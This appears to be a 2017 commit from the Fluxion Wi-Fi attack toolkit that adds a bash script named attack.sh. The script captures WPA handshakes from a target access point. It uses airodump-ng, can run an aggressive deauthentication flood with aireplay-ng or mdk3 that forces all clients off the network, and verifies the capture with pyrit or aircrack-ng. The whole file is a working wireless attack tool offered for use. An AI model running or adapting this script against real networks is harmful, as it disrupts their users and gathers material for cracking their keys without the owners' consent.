Refactored handshake capturing as an attack script.

Most spaghetti code has be removed or replaced with better alternatives. Discarded dead/non-working code to allow for future reimplementation. Two types of attack are possible, passive, or aggressive using aireplay-ng or mdk3. A verifier daemon is now responsible for stopping captures and, optionally, deauthentication when a valid hash has been acquired.
2017-08-08 13:21:46 -05:00 · 2017-08-08 13:21:46 -05:00 · 708e5dc9d9
parent f541c2ba1f
commit 708e5dc9d9
1 changed files with 172 additions and 0 deletions
--- a/Snooper/attack.sh
+++ b/Snooper/attack.sh
@ -0,0 +1,172 @@
+#!/bin/bash
+
+########################### < Handshake Snooper Parameters > ###########################
+
+HandshakeSnooperState="Not Ready"
+
+################################# < Handshake Snooper > ################################
+function handshake_verifier_daemon() {
+	if [ ${#@} -lt 5 ]; then return 1; fi
+
+	handshakeVerifierState="running"
+
+	function handle_verifier_abort() {
+		handshakeVerifierState="aborted"
+	}
+
+	trap handle_verifier_abort SIGABRT
+
+	source lib/HashUtils.sh
+
+	local handshakeCheckResult=1 # Assume invalid
+	while [ $handshakeCheckResult -ne 0 -a "$handshakeVerifierState" = "running" ]; do
+		sleep 3
+		pyrit -r $4 -o ${4/.cap/-clean.cap} stripLive
+		hash_check_handshake $3 ${4/.cap/-clean.cap} "${@:5:2}"
+		handshakeCheckResult=$?
+	done
+
+	# If handshake didn't pass verification, it was aborted.
+	if [ $handshakeCheckResult -ne 0 ]; then return 1; fi
+
+	mv "${4/.cap/-clean.cap}" "$2"
+
+	# Signal parent process the verification terminated.
+	kill -s SIGABRT $1
+}
+
+function handshake_stop_verifier() {
+	if [ "$HANDSHAKEVerifierPID" ]; then
+		kill -s SIGABRT $HANDSHAKEVerifierPID &> $FLUXIONOutputDevice
+	fi
+
+	HANDSHAKEVerifierPID=""
+}
+
+# Parameters: path, SSID, MAC
+function handshake_start_verifier() {
+	# if [ ${#@} -lt 3 ]; then return 1; fi
+	handshake_verifier_daemon $$ \
+	$FLUXIONPath/attacks/Handshake\ Snooper/handshakes/$APTargetSSIDClean-$APTargetMAC.cap \
+	$HANDSHAKEVerifier $FLUXIONWorkspacePath/capture/dump-01.cap \
+	"$APTargetSSID" "$APTargetMAC" &> $FLUXIONOutputDevice &
+	HANDSHAKEVerifierPID=$!
+}
+
+function handshake_stop_deauthenticator() {
+	if [ "$HANDSHAKEDeauthenticatorPID" ]; then
+		kill $HANDSHAKEDeauthenticatorPID &> $FLUXIONOutputDevice
+	fi
+
+	HANDSHAKEDeauthenticatorPID=""
+}
+
+function handshake_start_deauthenticator() {
+	if [ "$HANDSHAKEDeauthenticatorPID" ]; then return 0; fi
+
+	case "$HANDSHAKEMethod" in
+		"aireplay-ng"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
+						aireplay-ng --deauth=9999999999 -a $APTargetMAC --ignore-negative-one $WIMonitor &
+			HANDSHAKEDeauthenticatorPID=$!;;
+		"mdk3"*) xterm $FLUXIONHoldXterm $BOTTOMRIGHT -bg "#000000" -fg "#FF0009" -title "Deauthenticating all clients on $APTargetSSID" -e \
+				 mdk3 $WIMonitor d -b $FLUXIONWorkspacePath/mdk3.txt -c $APTargetChannel &
+			HANDSHAKEDeauthenticatorPID=$!;;
+	esac
+}
+
+function handshake_stop_captor() {
+	if [ "$HANDSHAKECaptorPID" ]; then
+		kill $HANDSHAKECaptorPID &> $FLUXIONOutputDevice
+	fi
+
+	HANDSHAKECaptorPID=""
+}
+
+function handshake_start_captor() {
+	if [ "$HANDSHAKECaptorPID" ]; then return 0; fi
+
+	xterm -hold -title "Handshake Captor (CH $APTargetChannel)" $TOPRIGHT -bg "#000000" -fg "#FFFFFF" -e \
+	airodump-ng -d $APTargetMAC -w $FLUXIONWorkspacePath/capture/dump -c $APTargetChannel -a $WIMonitor &
+
+	sleep 3
+	HANDSHAKECaptorPID=$(ps a | awk '$5~/^airodump-ng/ && $7~/'"$APTargetMAC"'/{print $1}')
+}
+
+function handshake_unset_method() {
+	HANDSHAKEMethod=""
+}
+
+function handshake_set_method() {
+	if [ "$HANDSHAKEMethod" ]; then return 0; fi
+
+	local methods=("Monitor (${CYel}passive$CClr)" "aireplay-ng deauthentication (${CRed}aggressive$CClr)" "mdk3 deauthentication (${CRed}aggressive$CClr)" "$general_back")
+	io_query_choice "Select a method of handshake retrieval" methods[@]
+
+	HANDSHAKEMethod=$IOQueryChoice
+
+	if [ "$HANDSHAKEMethod" = "$general_back" ]; then
+		handshake_unset_method
+		return 1
+	fi
+}
+
+function handshake_unset_verifier() {
+	HANDSHAKEVerifier=""
+}
+
+function handshake_set_verifier() {
+	if [ "$HANDSHAKEVerifier" ]; then return 0; fi
+
+	local verifiers=("pyrit" "aircrack-ng" "$general_back") # "pyrit (${CGrn}recommended$CClr)" "aircrack-ng (unreliable)")
+	io_query_choice "Select a method of handshake retrieval" verifiers[@]
+
+	HANDSHAKEVerifier=$IOQueryChoice
+
+	if [ "$HANDSHAKEVerifier" = "$general_back" ]; then
+		handshake_unset_verifier
+		handshake_unset_method
+		return 1
+	fi
+}
+
+function unprep_attack() {
+	HandshakeSnooperState="Not Ready"
+	handshake_unset_verifier
+	handshake_unset_method
+
+	sandbox_remove_workfile "$FLUXIONWorkspacePath/capture"
+}
+
+function prep_attack() {
+	# if [ ${#@} -ne 3 ]; then return 1; fi
+
+	mkdir $FLUXIONWorkspacePath/capture
+
+	while true; do
+		handshake_set_method;	if [ $? -ne 0 ]; then break; fi
+		handshake_set_verifier;	if [ $? -ne 0 ]; then continue; fi
+		HandshakeSnooperState="Ready"
+		break
+	done
+
+	# Check for handshake abortion.
+	if [ "$HandshakeSnooperState" = "Not Ready" ]; then
+		unprep_attack
+		return 1;
+	fi
+}
+
+function stop_attack() {
+	handshake_stop_deauthenticator
+	handshake_stop_verifier
+	handshake_stop_captor
+	handshake_unset_verifier
+}
+
+# Parameters: path, SSID, MAC
+function start_attack() {
+	handshake_start_captor
+	handshake_start_deauthenticator
+	handshake_start_verifier
+}
+# FLUXSCRIPT END